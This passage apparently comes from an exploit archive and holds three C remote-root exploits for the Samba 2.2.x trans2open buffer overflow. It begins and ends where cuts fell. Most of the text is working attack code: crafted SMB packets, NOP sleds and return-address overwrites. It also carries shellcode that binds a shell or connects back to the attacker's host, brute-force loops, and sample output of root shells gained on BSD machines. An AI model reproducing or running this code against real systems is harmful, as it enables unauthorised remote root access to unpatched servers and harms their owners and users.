0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x5c,0x5c,0x69,0x70,0x63,0x24,0x25,0x6e, 0x6f,0x62,0x6f,0x64,0x79,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x49,0x50,0x43,0x24 }; int first_packet_len=sizeof(its_first_time_conn); int second_packet_len=sizeof(its_second_time_conn); memset((char *)atk_buf,0,sizeof(atk_buf)); memcpy(atk_buf,its_first_time_conn,sizeof(its_first_time_conn)); send(sock,atk_buf,first_packet_len,0); recv(sock,atk_buf,sizeof(atk_buf)-1,0); memset((char *)atk_buf,0,sizeof(atk_buf)); memcpy(atk_buf,its_second_time_conn,sizeof(its_second_time_conn)); send(sock,atk_buf,second_packet_len,0); recv(sock,atk_buf,sizeof(atk_buf)-1,0); memset((char *)atk_buf,0,sizeof(atk_buf)); memcpy(atk_buf+atk_buf_pos,its_exploit_packet,sizeof(its_exploit_packet)); atk_buf_pos+=sizeof(its_exploit_packet); memset(atk_buf+atk_buf_pos,DF_NOP,((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos)); atk_buf_pos+=((__BUF_LEN-__LEN_PAD)-strlen(shellcode)-atk_buf_pos); memcpy(atk_buf+atk_buf_pos,shellcode,strlen(shellcode)); atk_buf_pos+=strlen(shellcode); memset(atk_buf+atk_buf_pos,DF_NOP,__LEN_PAD); atk_buf_pos+=(__LEN_PAD); #ifdef __DEBUG sleep(10); #endif { *(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp atk_buf_pos+=4; *(long *)&atk_buf[atk_buf_pos]=(shell);// retaddr; atk_buf_pos+=4; *(long *)&atk_buf[atk_buf_pos]=(shell-(0x82*2));// fake fp atk_buf_pos+=4; } send(sock,atk_buf,sizeof(atk_buf)-1,0); } int main(int argc,char *argv[]) { int sock,whtl,type=0,brute_f=0; char tg_host[0x82]="localhost"; u_long shell=plat[type].shell; (void)banrl(); if(argc<2) { (void)usage(argv[0]); } while((whtl=getopt(argc,argv,"H:h:S:s:T:t:IiB:b"))!=-1) { extern char *optarg; switch(whtl) { case 'H': case 'h': memset((char *)tg_host,0,sizeof(tg_host)); strncpy(tg_host,optarg,sizeof(tg_host)-1); break; case 'S': case 's': shell=strtoul(optarg,0,0); break; case 'T': case 't': if((type=atoi(optarg))>1) { (void)usage(argv[0]); } else shell=plat[type].shell; break; case 'I': case 'i': (void)usage(argv[0]); break; case 'B': case 'b': brute_f++; break; case '?': fprintf(stderr," Try `%s -i' for more information.\n\n",argv[0]); exit(-1); break; } } if(brute_f) { fprintf(stdout," **\n ** OK, It's good selection, Attack tries %d times.\n",BRUTE_AT); fprintf(stdout," ** If work process is boring, drink coffee and wait. hehe ;-D\n **\n\n"); fprintf(stdout," [*] Brute-Force mode:\n\n"); fprintf(stdout," |----+----+----+----+----+----+----+----+----+----+----+----+----|"); fprintf(stdout,"\n |"); for(brute_f=0;brute_f<BRUTE_AT;brute_f++) { fflush(stdout); fprintf(stdout,"="); shell+=(0x100); sock=(int)setsock(tg_host,ATK_PORT); if((int)re_connt(sock,0)==-1) { while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stderr," [-] Connect Failed.\n\n"); exit(-1); } __atk_code_send_recv(sock,shell); close(sock); sleep(2); sock=(int)setsock(tg_host,SH_PORT); if((int)re_connt(sock,0)==-1) { continue; } while(!(brute_f>=BRUTE_AT-1)) { fprintf(stdout,"="); brute_f++; } fprintf(stdout,"|\n\n"); fprintf(stdout," [+] Shellcode address: %p\n",shell); fprintf(stdout," [*] Brute-Force end !!\n\n"); fprintf(stdout," **\n ** Bind shellcode is port 10000.\n"); fprintf(stdout," ** If bindshell port number was changed, change connection port.\n **\n\n"); (void)send_recv_sh(sock); } fprintf(stdout,"|\n\n **\n"); fprintf(stdout," ** Brute-Force exploit failed. Reason is simple.\n **\n"); fprintf(stdout," ** Could not search shellcode's position during %d times.\n",BRUTE_AT); fprintf(stdout," ** Or, Operating System's target that we attack isn't.\n"); fprintf(stdout," ** OOops ! is server Samba version doubtful ??\n **\n\n"); exit(-1); } else { fprintf(stdout," [0] Target: %s\n",plat[type].ost); fprintf(stdout," [1] Set socket.\n"); sock=(int)setsock(tg_host,ATK_PORT); (int)re_connt(sock,1); fprintf(stdout," [2] Make shellcode & Send Packet.\n"); __atk_code_send_recv(sock,shell); close(sock); fprintf(stdout," [3] Trying %s:%d.\n",tg_host,SH_PORT); sleep(2); sock=(int)setsock(tg_host,SH_PORT); (int)re_connt(sock,1); fprintf(stdout," [*] Connected to %s:%d.\n",tg_host,SH_PORT); (void)send_recv_sh(sock); } } int setsock(char *hostip,int port) { int sock; struct hostent *he; struct sockaddr_in x82; if((he=gethostbyname(hostip))==NULL) { return(-1); } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) { return(-1); } x82.sin_family=AF_INET; x82.sin_port=htons(port); x82.sin_addr=*((struct in_addr *)he->h_addr); memset(&(x82.sin_zero),0,8); if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-1) { return(-1); } return(sock); } int re_connt(int sock,int type) { if(sock==-1) { if(type) { fprintf(stderr," [-] Connect Failed.\n\n"); exit(-1); } else return(-1); } } void send_recv_sh(int sock) { int pk; struct timeval tm; char *t_cmd="su -l\n"; char *n_cmd="uname -a;id;exec sh -i\n"; char rbuf[1024]; fd_set rset; memset((char *)rbuf,0,sizeof(rbuf)); fprintf(stdout," [*] Executed shell successfully !\n"); fprintf(stdout," [*] Command: # su -l; uname -a; id; exec sh -i\n\n"); send(sock,t_cmd,strlen(t_cmd),0); send(sock,n_cmd,strlen(n_cmd),0); tm.tv_sec=10; tm.tv_usec=0; while(1) { fflush(stdout); FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock+1,&rset,NULL,NULL,&tm); if(FD_ISSET(sock,&rset)) { pk=read(sock,rbuf,sizeof(rbuf)-1); if(pk<=0) { fprintf(stdout," [*] Happy-Exploit\n\n"); close(sock); exit(0); } rbuf[pk]=0; fprintf(stdout,"%s",rbuf); } if(FD_ISSET(STDIN_FILENO,&rset)) { pk=read(STDIN_FILENO,rbuf,sizeof(rbuf)-1); if(pk>0) { rbuf[pk]=0; write(sock,rbuf,pk); } } } return; } void banrl() { fprintf(stdout,"\n Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD\n"); fprintf(stdout," by Xpl017Elz.\n\n"); } void usage(char *p_name) { int r_s=0; fprintf(stdout," Usage: %s -option [argument]\n",p_name); fprintf(stdout,"\n\t-h - hostname. (default: localhost)\n"); fprintf(stdout,"\t-s - shellcode. (select target)\n"); fprintf(stdout,"\t-t - target number.\n"); fprintf(stdout,"\t-b - auto brute-force attack mode.\n"); fprintf(stdout,"\t-i - help information.\n\n"); fprintf(stdout," Select target number:\n\n"); for(;;) { if(plat[r_s].ost==NULL) break; else fprintf(stdout,"\t{%d} %s\n",plat[r_s].num,plat[r_s].ost); r_s++; } fprintf(stdout,"\n Example> %s -hlocalhost -s 0x82828282\n\n",p_name); exit(-1); } /* ** ** OpenBSD exploit: ** -- ** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t1 ** ** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD ** by Xpl017Elz. ** ** [0] Target: OpenBSD 3.0 GENERIC#94 i386, Samba v2.2.x ** [1] Set socket. ** [2] Make shellcode & Send Packet. ** [3] Trying 61.37.xxx.xx:10000. ** [*] Connected to 61.37.xxx.xx:10000. ** [*] Executed shell successfully ! ** [*] Command: # su -l; uname -a; id; exec sh -i ** ** tset: standard error: Operation not supported ** OpenBSD testsub 3.0 GENERIC#94 i386 ** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) ** sh: No controlling tty (open /dev/tty: Device not configured) ** sh: Can't find tty file descriptor ** sh: warning: won't have full job control ** # ** -- ** ** FreeBSD exploit: ** -- ** bash$ ./0x82-Remote.54AAb4.xpl -h 61.37.xxx.xx -t0 ** ** Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD ** by Xpl017Elz. ** ** [0] Target: FreeBSD 4.6.2-RELEASE #0 i386, Samba v2.2.x ** [1] Set socket. ** [2] Make shellcode & Send Packet. ** [3] Trying 61.37.xxx.xx:10000. ** [*] Connected to 61.37.xxx.xx:10000. ** [*] Executed shell successfully ! ** [*] Command: # su -l; uname -a; id; exec sh -i ** ** Warning: no access to tty (Bad file descriptor). ** Thus no job control in this shell. ** FreeBSD localhost 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Wed Aug 14 21:23:26 GMT 2002 ** murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386 ** uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) ** sh: can't access tty; job control turned off ** # ** -- ** */

/* source: https://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory. Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process. It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/78/files */ /* 0x333hate => samba 2.2.x remote root exploit * * generic linux x86 samba remote root * exploit, based on trans2root.pl * * coded by c0wboy * * ~ www.0x333.org ~ */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #define fatal(x...) { fprintf (stderr, ##x); exit(-333); } #define BUFFER 1500 #define SHELL 5074 #define PORT 139 #define NOP 0x90 #define START 0xbfffffff #define STOP 0xbf000000 #define OFFSET 512 typedef enum {FALSE,TRUE} BOOLEAN; unsigned char setup1[] = "\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00" "\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00" "\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; unsigned char setup2[] = "\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00" "\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64" "\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; unsigned char overflow[] = "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07" "\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x90"; unsigned char shellcode[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66" "\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89" "\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89" "\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52" "\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80" "\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68" "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd" "\x80"; int main (int argc, char *[]); void usage (char *); void hate (unsigned long); void exploit (void); BOOLEAN connection(char *, int); int owned (int); char buffer[BUFFER]; char zero[808] = ""; char * target=NULL; int port = PORT; struct sockaddr_in temp; struct hostent *h; int fdsocket; void usage (char * prg) { fprintf (stderr, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n"); fprintf (stderr, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n"); fprintf (stderr, " Usage : %s [-t target] [-p port] [-h]\n\n", prg); fprintf (stderr, " \t-t\ttarget to attack\n"); fprintf (stderr, " \t-p\tsamba port (default 139)\n"); fprintf (stderr, " \t-h\tdisplay this help\n\n"); exit(-333); } void hate (unsigned long ret) { int i; char *ptr=buffer; bzero(buffer, BUFFER); memcpy ((char *)ptr, overflow, 96); ptr += 96; memset ((char *)ptr, NOP, (772+36)); ptr += (772+36); memcpy ((char *)ptr, shellcode, strlen (shellcode)); ptr += strlen (shellcode); memset ((char *)ptr, NOP, (87+44)); ptr += (87+44); for (i = 1127 ; i < 1159 ; i += 4) *(long *) &buffer[i] = ret; } void exploit (void) { BOOLEAN status; char outside[333]; if(!(status = connection (target, port))) fatal (" [~] Error in connection\n"); /* here we setup connection */ if (send (fdsocket, setup1, sizeof (setup1)-1, 0) < 0) fatal (" [~] Error in setup (1) connection\n"); recv (fdsocket, outside, sizeof (outside)-1, 0); if (send (fdsocket, setup2, sizeof (setup2)-1, 0) < 0) fatal (" [~] Error in setup (2) connection\n"); recv (fdsocket, outside, sizeof (outside)-1, 0); /* exploiting samba */ if (send (fdsocket, buffer, sizeof (buffer)-1, 0) < 0) fatal (" [~] Error in exploiting samba\n"); if (send (fdsocket, zero, sizeof (zero)-1, 0) < 0) fatal (" [~] Error in exploiting samba\n"); close (fdsocket); if((status = connection (target, SHELL))) { owned (fdsocket); close (fdsocket); } } BOOLEAN connection (char *host, int port) { BOOLEAN status = TRUE; temp.sin_family = AF_INET; temp.sin_port = htons (port); h = gethostbyname (host); if (h == 0) status = FALSE; else { bcopy (h->h_addr,&temp.sin_addr,h->h_length); if ((fdsocket = socket (AF_INET,SOCK_STREAM,0)) < 0) status = FALSE; else if ((connect (fdsocket, (struct sockaddr*) &temp, sizeof (temp))) < 0) status = FALSE; } return status; } int owned (int fdsocket) { fd_set cya; char outside[1024], *cmd="uname -a;id;\n"; int x; FD_ZERO (&cya); FD_SET (fdsocket, &cya); FD_SET (0, &cya); send (fdsocket, cmd, strlen (cmd), 0); for(;;) { FD_SET (fdsocket, &cya); FD_SET (0, &cya); if (select (FD_SETSIZE, &cya, NULL, NULL, NULL) < 0) break; if (FD_ISSET (fdsocket, &cya)) { if ((x = recv (fdsocket, outside, sizeof (outside)-1, 0)) < 0) fatal (" [-] cya\n"); if (write (1, outside, x) < 0) break; } if (FD_ISSET (0, &cya)) { if ((x = read (0, outside, sizeof (outside)-1)) < 0) fatal ("[-] cya\n"); if (send (fdsocket, outside, x, 0) < 0) break; } usleep(10); } fprintf (stderr, " [-] cya hax0r\n"); exit(0); } int main (int argc, char * argv[]) { int c; unsigned long ret; while((c=getopt (argc, argv, "ht:p:")) != EOF) { switch(c) { case 't': target = optarg; break; case 'p': port = atoi (optarg); break; case 'h': usage (argv[0]); default : usage (argv[0]); } } if (argc==1 || target == NULL) usage (argv[0]); fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n"); fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n"); fprintf (stdout, " [-] connecting to %s:%d\n", target, port); fprintf (stdout, " [-] stating bruteforce\n\n"); for (ret=START; ret>=STOP; ret-=OFFSET) { fprintf (stdout, " [-] testing 0x%x\n", ret); hate (ret); exploit (); } fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n"); return 0; }

// source: https://www.securityfocus.com/bid/7294/info A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory. Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process. It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected. /* * Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003. * Using connect back method and brute force mode. * I just create & modify some code and ripped too :P * Create on May, 12st 2003 * * Thanks to eDSee (netric.org), Sambal is nice exploit bro... * References: trans2root.pl, 0x333hate.c, sambal.c * This code just for eduction purpose * * XNUXER RESEARCH LABORATORY * Official Site: http://infosekuriti.com * Contact Email: xnuxer@yahoo.com, xnuxer@hackermail.com */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netdb.h> #include <errno.h> #include <fcntl.h> #include <signal.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <sys/select.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <sys/wait.h> #include <netinet/in.h> #include <arpa/inet.h> char linux_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68" "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50" "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68" "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; char bsd_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50" "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50" "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89" "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; typedef struct { unsigned char type; unsigned char flags; unsigned short length; } NETBIOS_HEADER; typedef struct { unsigned char protocol[4]; unsigned char command; unsigned short status; unsigned char reserved; unsigned char flags; unsigned short flags2; unsigned char pad[12]; unsigned short tid; unsigned short pid; unsigned short uid; unsigned short mid; } SMB_HEADER; pid_t childs[50]; int LOOP = 1; struct sockaddr_in serv_addr; int sock_listen, client; int exploit_pid; int listen_pid; int port_listen = 45295; void usage(char *prog) { int i; fprintf(stdout, "Samba < 2.2.8 Remote Root exploit by Schizoprenic\n" "Connect back method, Xnuxer-Labs, 2003.\n" "Usage : %s <type> <victim> <your_ip>\n" "Targets:\n" " 0 = Linux\n" " 1 = FreeBSD/NetBSD\n" " 2 = OpenBSD 3.0 and prior\n" " 3 = OpenBSD 3.2 - non-exec stack\n\n", prog); exit(1); } int Connect(int fd, char *ip, unsigned int port, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set connect_read, connect_write; struct timeval timeout; int getsockopt_length = 0; int getsockopt_error = 0; struct sockaddr_in server; bzero(&server, sizeof(server)); server.sin_family = AF_INET; inet_pton(AF_INET, ip, &server.sin_addr); server.sin_port = htons(port); if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return -1; } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return -1; } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&connect_read); FD_ZERO(&connect_write); FD_SET(fd, &connect_read); FD_SET(fd, &connect_write); if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) { if(errno != EINPROGRESS) { close(fd); return -1; } } else { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) { if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) { getsockopt_length = sizeof(getsockopt_error); if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) { errno = ETIMEDOUT; close(fd); return -1; } if(getsockopt_error == 0) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { errno = getsockopt_error; close(fd); return (-1); } } } else { close(fd); return 1; } if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } int read_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdread; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdread); FD_SET(fd, &fdread); select_status = select(fd + 1, &fdread, NULL, NULL, &timeout); if(select_status == 0) { close(fd); return (-1); } if(select_status == -1) { close(fd); return (-1); } if(FD_ISSET(fd, &fdread)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return 1; } } int write_timer(int fd, unsigned int time_out) { /* ripped from no1 */ int flags; int select_status; fd_set fdwrite; struct timeval timeout; if((flags = fcntl(fd, F_GETFL, 0)) < 0) { close(fd); return (-1); } if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) { close(fd); return (-1); } timeout.tv_sec = time_out; timeout.tv_usec = 0; FD_ZERO(&fdwrite); FD_SET(fd, &fdwrite); select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout); if(select_status == 0) { close(fd); return -1; } if(select_status == -1) { close(fd); return -1; } if(FD_ISSET(fd, &fdwrite)) { if(fcntl(fd, F_SETFL, flags) < 0) { close(fd); return -1; } return 1; } else { close(fd); return -1; } } int start_session(int sock) { char buffer[1000]; char response[4096]; char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00"; char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79" "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24"; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x2E); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x73; /* session setup */ smbheader->flags = 0x08; /* caseless pathnames */ smbheader->flags2 = 0x01; /* long filenames supported */ smbheader->pid = getpid() & 0xFFFF; smbheader->uid = 100; smbheader->mid = 0x01; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 50, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); //if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n"); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); memset(buffer, 0x00, sizeof(buffer)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x00; netbiosheader->length = htons(0x3C); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x70; /* start connection */ smbheader->pid = getpid() & 0xFFFF; smbheader->tid = 0x00; smbheader->uid = 100; memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1); if(write_timer(sock, 3) == 1) if (send(sock, buffer, 64, 0) < 0) return -1; memset(response, 0x00, sizeof(response)); if (read_timer(sock, 3) == 1) if (read(sock, response, sizeof(response) - 1) < 0) return -1; netbiosheader = (NETBIOS_HEADER *)response; smbheader = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER)); if (netbiosheader->type != 0x00) return -1; return 0; } int exploit_normal(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x90; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 0x00, sizeof(buffer)); netbiosheader = (NETBIOS_HEADER *)buffer; smbheader = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER)); netbiosheader->type = 0x00; /* session message */ netbiosheader->flags = 0x04; netbiosheader->length = htons(2096); smbheader->protocol[0] = 0xFF; smbheader->protocol[1] = 'S'; smbheader->protocol[2] = 'M'; smbheader->protocol[3] = 'B'; smbheader->command = 0x32; /* SMBtrans2 */ smbheader->tid = 0x01; smbheader->uid = 100; memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000); buffer[1096] = 0xEB; buffer[1097] = 0x70; for (i = 0; i < 4 * 24; i += 8) { memcpy(buffer + 1099 + i, &dummy, 4); memcpy(buffer + 1103 + i, &ret, 4); } memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), exploit_data, sizeof(exploit_data) - 1); memcpy(buffer + 1800, shellcode, strlen(shellcode)); if(write_timer(sock, 3) == 1) { if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1; return 0; } return -1; } int exploit_openbsd32(int sock, unsigned long ret, char *shellcode) { char buffer[4000]; char exploit_data[] = "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x90"; int i = 0; unsigned long dummy = ret - 0x30; NETBIOS_HEADER *netbiosheader; SMB_HEADER *smbheader; memset(buffer, 